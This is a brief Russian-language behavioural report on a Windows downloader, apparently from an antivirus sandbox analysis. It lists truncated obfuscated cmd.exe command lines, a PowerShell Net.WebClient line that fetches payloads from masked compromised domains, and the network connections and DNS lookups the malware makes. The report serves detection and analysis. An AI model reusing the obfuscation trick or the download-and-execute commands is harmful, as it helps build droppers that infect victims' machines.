Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V:O\C"set S8M=gw-1H'Tc=GVFEv\l$Rf9qUW N5)PM(0dmtkn:yBa\Lj;,3rXDxACipuh%@}2o76+eS{zb~OsI4.&&for %I in (53,60,1,56,27,21,38,41,72,51,36,69,25,44,3,56,46,5...
Сетевая активность
Подключается к
- 'be######rammingbooks.com':80
- 'pa####eixeira.com':80
- 'pa####eixeira.com':443
TCP
Другие
- 'pa####eixeira.com':443
UDP
- DNS ASK be######rammingbooks.com
- DNS ASK pa####eixeira.com
- DNS ASK sh####tockshop.ru
- DNS ASK ma####voltaire.org
- DNS ASK xa#####phuongdong.net
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V:O\C"set S8M=gw-1H'Tc=GVFEv\l$Rf9qUW N5)PM(0dmtkn:yBa\Lj;,3rXDxACipuh%@}2o76+eS{zb~OsI4.&&for %I in (53,60,1,56,27,21,38,41,72,51,36,69,25,44,3,56,46,5...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V:O/C"set S8M=gw-1H'Tc=GVFEv/l$Rf9qUW N5)PM(0dmtkn:yBa\Lj;,3rXDxACipuh%@}2o76+eS{zb~OsI4.&&for %I in (53,60,1,56,27,21,38,41,72,51,36,69,25,44,3,56,46,56,65,12,65,65,72,70,24,24,50,28,12,36,69...
- '<SYSTEM32>\cmd.exe' /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $rnclf='wpozack';$asnjm=new-object Net.WebClient;$widwqid='http://be######rammingbooks.com/wp-admin/caD67CPRUd@http://www.pabl...
- '<SYSTEM32>\cmd.exe'
